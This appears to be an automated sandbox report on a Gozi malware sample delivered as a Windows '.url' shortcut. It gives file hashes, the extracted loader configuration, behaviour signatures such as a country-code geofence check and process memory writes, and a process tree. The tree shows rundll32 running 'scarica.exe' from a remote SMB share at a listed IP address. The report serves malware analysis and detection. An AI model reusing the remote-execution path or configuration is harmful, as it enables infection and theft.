Analysis
  max time kernel:  147s
  max time network: 176s
  platform:         windows10-2004_x64
  resource:         win10v2004-20221111-en
  resource tags:    arch:x64 arch:x86 image:win10v2004-20221111-en locale:en-us os:windows10-2004-x64 system
  submitted:        09/02/2023, 14:04
Static task: static1
Behavioral task: behavioral1
  Sample:   documento/documento.url
  Resource: win7-20220812-en
General
  Target: documento/documento.url
  Size:   193B
  MD5:    edca65cabb466cc4d38738f4661bfe47
  SHA1:   3d3ab1139b38b6e3fd16f26315b57fe9d904397c
  SHA256: b6ece3b9c859b0baa1d09bc27a77df0e35a9bb0f866eefc726a3237a0eaa37fc
  SHA512: ddffc79858639112d3f2337c6bbf0bbee4a8331153cb06be499cfbe543c36f371834ef376266ccf4af1f52cd54f58c08c56f0f4b7d06b19921f96617eda323e8
Malware Config
  Extracted: gozi
  7708
  base_path: /drew/
  build:     250255
  exe_type:  loader
  extension: .jlk
  server_id: 50
Signatures
  Checks computer location settings (2 TTPs, 1 IoC)
    Looks up country code configured in the registry, likely geofence.
    description        ioc                                                                                              Process
    Key value queried  \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation  rundll32.exe
  Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  Suspicious use of WriteProcessMemory (3 IoCs)
    description                       pid   Process       procid_target
    PID 4824 wrote to memory of 5028  4824  rundll32.exe  80
    PID 4824 wrote to memory of 5028  4824  rundll32.exe  80
    PID 4824 wrote to memory of 5028  4824  rundll32.exe  80
Processes
  1. C:\Windows\System32\rundll32.exe
     Command line: "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\documento\documento.url
     PID: 4824
     - Checks computer location settings
     - Suspicious use of WriteProcessMemory
     2. \??\UNC\46.8.19.244\Agenzia\scarica.exe
        Command line: "\\46.8.19.244\Agenzia\scarica.exe"
        PID: 5028